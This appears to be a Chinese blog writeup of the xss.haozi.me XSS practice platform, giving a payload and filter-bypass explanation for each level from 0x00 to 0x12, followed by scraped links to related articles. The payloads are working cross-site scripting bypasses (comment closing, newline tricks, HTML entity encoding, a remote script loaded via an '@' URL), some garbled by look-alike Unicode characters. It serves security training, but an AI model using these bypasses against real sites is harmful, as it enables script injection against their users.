前言

这里的Payload仅仅为一种思路,还有着很多其他绕过方法

练习平台

writeup

关卡 Payload 说明
0x00 <svg src=x οnlοad=alert(1)> 没有什么过滤,直接弹框即可
0x01 </textarea><svg οnlοad=“alert(1)”> 在<textarea></textarea>标签之中的标签是不会被解析到DOM树中,所以需要先闭合/
0x02 "><svg src=x οnlοad=alert(1)> 直接闭合前面的标签即可
0x03 <svg src=x οnlοad=alert`1`>
或者
<svg src=x οnlοad=alert(1)>
此处使用正则进行过滤,可以使用反单引号(`)来进行绕过
也可通过HTML实体编码来进行绕过
0x04 <svg src=x οnlοad=alert(1)> 此处使用HTML实体编码进行绕过
0x05 –!><svg src=x οnlοad=alert(1)> 此处使用正则对HTML注释(–>)进行过滤,但是可以使用 --!> 来将注释进行闭合
0x06 onclick
=alert(1)
此处使用正则对 on事件 进行过滤,可以通过换行来进行绕过
0x07 <svg οnlοad=“alert(1)” 此处过滤了尖括号之间的字符,不过由于浏览器的兼容性,反尖括号(>)可以省略,从而进行绕过
0x08 </style
>
<script>alert(1)</script>
通过换行进行绕过,从而闭合<style>标签,进而完成弹框
0x09 https://www.segmentfault.com111" οnerrοr="alert(1) 输入正确地址,使用双引号(")将前面事件闭合即可
0x0A https://www.segmentfault.com@xss.haozi.me/j.js 使用 @ 会以 @ 前的字符串作为用户名来访问 @ 后面的网址
0x0B <img src="" οnerrοr="alert(1)"> 使用HTML实体编码进行绕过
0x0C <img src="" οnerrοr="alert(1)"> 使用HTML实体编码进行绕过
0x0D
alert(1)
–>
先使用回车(换行)逃逸出注释范围,然后再使用 --> 将多余的 ') 进行注释即可
0x0E <ſcript src="" οnerrοr="alert(1)"> 脑洞题,ſ 大写后为 S(ſ 不等于s)
0x0F ');alert('1 看起来使用了HTML实体编码来防止xss,但是了解浏览器解析规则(顺序)即可知道在属性值中的HTML实体编码会被浏览器成功解析,所以此处的HTML实体编码毫无用处
0x10 alert(1) 直接输入即可
0x11 ");alert("1 此处过滤后得到的字符其实还与原字符有着相同的作用(例如: " 被换成了 \" ,其实真正被转义的字符是第二个 \ ,而不是 "),所以此处的过滤也是毫无用处
0x12 ");</script><script>alert(1)// 与上一关卡同理,此处的过滤也是毫无用处

xss.haozi练习平台wp相关推荐

  1. xss靶场、xss.haozi.me靶场详细通关教程

    文章目录 前言 预备知识 HTML编码 img的可拓展 各种payload形式 0x00 0x01 0x02 0x03(使用了正则过滤圆括号) 其它解法 0x04(使用正则过滤圆括号和反引号) 0x0 ...

  2. xss.haozi.me通关教程

    10.xss.haozi.me通关教程 0x00 首先整体浏览网站 分别是xss注入点,注入后的HTML代码以及网页源码 构造常规payload: <script>alert(1)< ...

  3. xss.haozi 思路总结 0x00-0x12

    xss刷题网站2 https://xss.haozi.me/ 一个非常可爱的网站.这是网站界面,题目序号是十六进制,一共19道题. 0x00 直接输入<script>alert(1)< ...

  4. 简单xss接收cookie平台的搭建以及xss拿cookie的一些总结

    接收平台的搭建_BlueLotus_XSSReceiver 这个是搭建教程: 打Cookie小工具_BlueLotus_XSSReceiver 链接:百度网盘 请输入提取码 提取码: tdoj 我是将 ...

  5. 搭建HTTPS XSS漏洞利用平台

    目录 功能: 升级方式:

  6. IOS、Android、WP移动平台浏览器下常用字体支持度研究

    做了近一年的无线项目,总觉得少了点什么,对,是总结和研究,一直在追随前人的脚步,在他人的经验中获取认知,恐怕做得越多只会觉得得过且过的感觉越深刻,最近终于有空闲的时间来做一些研究和总结了. webap ...

  7. php xss ctf,GitHub - qiaofei32/BlueLotus_XSSReceiver: XSS平台 CTF工具 Web安全工具

    XSS数据接收平台(无SQL版) 如从旧版本升级,请务必先阅读Readme 平台说明 本平台设计理念: 简单配置即可使用,无需数据库,无需其他组件支持,可直接在php虚拟空间使用 SAE用户请切换到s ...

  8. xss绕过字符过滤_XSS绕过实战练习

    前言 写这篇博文起源来自于一次网络安全实验课,在实验虚拟环境里有一个xss挑战,估计是搬别人的xss挑战进来,我觉得挺有意思,就记录一下.有些关卡不能再虚拟环境实践,我在自己物理机上找到那个xss挑战 ...

  9. XSS表情包靶场通关记录

    平台 alert(1)https://xss.haozi.me 0X00 源码无防护,直接常规payload绕过 <script>alert(1)</script> <s ...

  10. XSS学习-初出茅庐

    XSS: 又叫跨站***,根据***类型分为以下三类: 1. 反射型 XSS -服务端没有把用户的输入数据进行标签过滤,直接在页面上输出.可能存在恶意代码的链接,诱导其他人点击进而实施***: 2. ...

最新文章

  1. TensorFlow 2.0开发者预览版发布
  2. tomcat WARNING [ContainerBackgroundProcessor[StandardEngine[Catalina]]]
  3. java 0x转中文_Java:转换汉字为unicode形式的字符串和转换unicode形式字符串转换成汉字...
  4. 2018计算机领域大事件,吕伟:2018年计算机行业回顾
  5. 开源方案搭建可离线的精美矢量切片地图服务-3.Mapbox个性化地图定制入门
  6. jQuery的概念、用法、常见面试题详解
  7. argb888与rgb888转换程序_一文了解各平台RGB565和RGB888区别
  8. java 自动启动监听_Spring Boot 启动事件和监听器,太强大了!
  9. Alibaba之MySQL宝典_Alibaba之MySQL宝典流出!极致经典,堪称行业天花板
  10. 解决java中对URL编码的问题
  11. chromium浏览器_轻松下载便携式Chromium浏览器
  12. Span 介绍及使用(一)
  13. 力扣-多线程专项(一)(按序打印、交替打印、打印零与奇偶数)
  14. 微信连wifi 电脑怎么连接到服务器,微信连wifi怎么用 微信连Wi-Fi开通使用教程-电脑教程...
  15. python post请求头部伪装随机(防止封ip)
  16. 2020安徽省大数据与人工智能网络赛题目
  17. Spring框架学习笔记,超详细!!(4)
  18. ESP32A1S开发之智能家居 语音唤醒 语音命令控制(持续更新)
  19. Sell变量的取用、删除、取代与替换
  20. 安超云生态|安超云与长城超云完成兼容互认证 携手打造协同生态

热门文章

  1. ffmpeg 修改分辨率
  2. 二十三、小程序中的三级下拉框(下拉菜单)
  3. Solidworks 草图绘制
  4. UG NX二次开发(C#)-建模-判断一张面是孔面还是凸台面
  5. HSA-TPP 人血清白蛋白-磷酸三苯酯,HSA-PEG-TPP
  6. MacBook安装rar解压工具
  7. 云计算机运用 技术,云计算技术在计算机数据处理中的应用
  8. 前端请求数据过多,Promise.all,_.chunk,_.flatten解决方法之一
  9. 5.3 react路由组件
  10. 修复XP图片和传真查看器!